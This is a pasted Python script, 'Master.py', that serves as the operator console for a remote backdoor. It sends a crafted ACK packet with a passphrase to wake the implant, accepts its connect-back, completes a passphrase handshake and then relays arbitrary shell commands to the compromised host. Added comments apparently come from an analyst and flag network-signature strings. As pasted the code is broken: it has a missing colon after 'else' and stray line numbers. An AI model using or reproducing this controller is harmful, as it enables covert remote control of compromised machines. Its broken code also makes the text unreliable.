WhichHat

Master.py

Mar 24th, 2017
  #!/usr/bin/env python3
  import sys
  import socket
  import logging
  # The "scapy.runtime" logger is raised to ERROR *before* scapy is imported;
  # presumably this silences scapy's import-time warnings (the order matters).
  logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  from scapy.all import *


  # Console state shared with Request() and ConnectBackdoor() through `global`.
  prompt = username = sep = ""

  # Placeholders, overwritten immediately by the interactive prompts below.
  gLHost = gRHost = ""   # local IP / remote (backdoored) host IP
  gLPort = gRPort = -1   # local listening port / port requested on the remote host


  # Everything is read from stdin at import time. The two port values go
  # through int(), so a non-numeric answer raises ValueError and stops the script.
  gLHost = input("[?] Local Host IP : ")
  gLPort = int(input("[?] Local Port Number : "))
  gRHost = input("[?] Backdoor Host IP : ")
  gRPort = int(input("[?] Request Backdoor Port : "))
  23.  
  24.  
  def Request(lHost, lPort, rHost, rPort):
      """Wake the remote listener and wait for its connect-back on lHost:lPort.

      Each attempt binds a TCP listener on (lHost, lPort), sends one crafted
      TCP segment to rHost:rPort, and waits up to 3 seconds for an inbound
      connection. Once a peer is accepted, a fixed text exchange
      ("passphrase2" / "passphrase3", then "Report" and "Location") fills the
      module globals ``prompt``, ``username`` and ``sep``.

      Returns:
          (skt, conn) on success, otherwise (None, None).

      Analyst notes: every literal in this exchange is written to a plain
      TCP socket with no encryption layer visible in this block, so the
      strings are usable as network-signature content. They read like
      placeholders, so confirm the real values against a live sample. As
      pasted, this block does not parse; see the note on the bare ``else``
      in the handshake loop.
      """
      global prompt
      global username
      global sep
      nbattempts = 3 # Three attempts in total; give up once all of them fail
      while nbattempts > 0:
          skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Allow re-binding the port while a previous socket is still in TIME_WAIT
          skt.settimeout(3) # Blocking calls (accept) give up after 3 seconds
          skt.bind((lHost, lPort)) # Bind the local listener
          skt.listen(1) # Listen backlog of 1
          # Wake-up packet: a single TCP segment with only the ACK flag set and
          # the payload "passphrase1", built with scapy and sent without this
          # script opening a connection to rHost:rPort first. On the wire that
          # is an ACK carrying data for a flow this script never established,
          # which is the observable a stateful firewall or network sensor can key on.
          send(IP(src=lHost, dst=rHost)/TCP(sport=lPort, dport=rPort, flags="A")/Raw(load="passphrase1"), verbose=0)
          try:
              conn, sender = skt.accept() # Wait for the inbound (connect-back) connection
              addr = sender[0]
              port = sender[1]
              # The peer is accepted when EITHER its source address equals rHost
              # OR its source port equals rPort; the two are not both required.
              if addr == rHost or port == rPort:
                  break
              else : # Something connected, but it is not treated as the expected peer
                  # Only the listener is closed here; `conn` is left open.
                  skt.close()
                  nbattempts -= 1
                  print("[!] Warning : Received unauthorized connection request... Connection refused")
          except socket.timeout: # accept() timed out
              skt.close()
              nbattempts -= 1
              print("[-] Failure : No answer... retrying")

      try:
          if nbattempts == 0: # No attempt left: the connection was never established
              # maybe because there is no backdoor on the given host
              # or the backdoor couldn't open the requested remote port
              # or a proxy/firewall dropped the wake-up packets
              # or too many unwanted connections hit the given local port... that would be quite worrying...
              # Raising here reuses the socket.timeout handler below as the failure path.
              raise socket.timeout()
          # Application-level handshake: send "passphrase2", expect "passphrase3".
          conn.sendall(b"passphrase2")
          passphrase = conn.recv(1024)
          # Both branches of this loop return, so its body runs at most once.
          while True:
              if type(passphrase) == bytes:
                  passphrase = passphrase.decode("utf-8")
              if passphrase == "passphrase3":
                  # "Report" and "Location" are requests; each reply is read with one recv.
                  conn.sendall(b"Report")
                  user=conn.recv(1024)
                  if type(user) == bytes:
                      user = user.decode("utf-8")
                  conn.sendall(b"Location")
                  location = conn.recv(1024)
                  if type(location) == bytes:
                      location = location.decode("utf-8")
                  # The last character of the "Report" reply is kept as the prompt
                  # separator; everything before it is the user name.
                  username = user[:len(user)-1]
                  sep = user[len(user)-1]
                  prompt = username+location+prompt
                  print("[+] Success : connected")
                  return skt, conn
              # NOTE(review): the `else` below has no trailing colon in the paste,
              # so the file is a SyntaxError as captured.
              else
                  skt.close()
                  conn.close()
                  return None, None
      except socket.timeout:
          # Only the listener is closed on this path.
          skt.close()
          print("[-] Failure : No answer from the backdoor")
          return None, None
      except (KeyboardInterrupt, SystemExit):
          skt.close()
          print("[-] Failure : User keyboard interruption")
          return None, None
  91.  
  92.  
  def SendCommand(conn, command):
      """Send one command string over *conn* and return the peer's reply as text.

      The command is encoded with ``str.encode`` and written with ``sendall``.
      A single ``recv`` of at most 65535 bytes is taken as the whole reply, so
      a longer or fragmented response is returned only in part. A ``bytes``
      reply is decoded as UTF-8; anything else is returned unchanged.
      """
      conn.sendall(str.encode(command))
      reply = conn.recv(65535)
      return reply.decode("utf-8") if type(reply) == bytes else reply
  99.    
  def ConnectBackdoor(lHost, lPort, rHost, rPort):
      """Run the interactive console on top of the connection Request() returns.

      Each non-empty line read from stdin is passed to SendCommand() and the
      reply is interpreted as follows:

      * first word "cd": a single-token reply becomes the new prompt path,
        anything else is printed;
      * reply "exited" or "released" (case-insensitive): print a status line
        and leave the loop;
      * reply "daemonnoreport" (case-insensitive): print nothing, since the
        peer sends it when a command produced no output;
      * any other reply is printed as-is.

      On Ctrl-C, SystemExit or any other exception an "exit" command is sent
      before the sockets are closed. Nothing happens when Request() returns
      (None, None).
      """
      global prompt, username, sep
      skt, conn = Request(lHost, lPort, rHost, rPort)
      if skt is None or conn is None:
          return

      # Replies that end the session, mapped to the status line printed for each.
      closing_lines = {
          "exited": "Success : Backdoor closed",
          "released": "Success : Backdoor removed",
      }

      def _send_exit(done_line):
          # Ask the peer to stop; print `done_line` only if it confirms.
          if SendCommand(conn, "exit").lower() == "exited":
              print(done_line)

      try:
          while True:
              command = input(prompt + " ")
              if command == "":
                  continue
              output = SendCommand(conn, command)
              # The command has already been sent when the first word is
              # examined; a whitespace-only line raises IndexError here and
              # lands in the generic handler below.
              if command.split()[0] == "cd":
                  if len(output.split()) == 1:
                      prompt = username + output + sep
                  else:
                      print(output)
                  continue
              verdict = output.lower()
              if verdict in closing_lines:
                  print(closing_lines[verdict])
                  break
              if verdict != "daemonnoreport":
                  print(output)
      except (KeyboardInterrupt, SystemExit):
          # Send an automatic exit so the remote side is not left locked.
          _send_exit("Success : Done")
      except Exception as err:
          print(err.args)
          print("[-] Error : Something went wrong :'(")
          # Same automatic exit on any other error.
          _send_exit("Success : Backdoor closed")
      finally:
          conn.close()
          skt.close()
  138.            
  139.  
  # Script entry: start the console session with the four values read from stdin.
  ConnectBackdoor(lHost=gLHost, lPort=gLPort, rHost=gRHost, rPort=gRPort)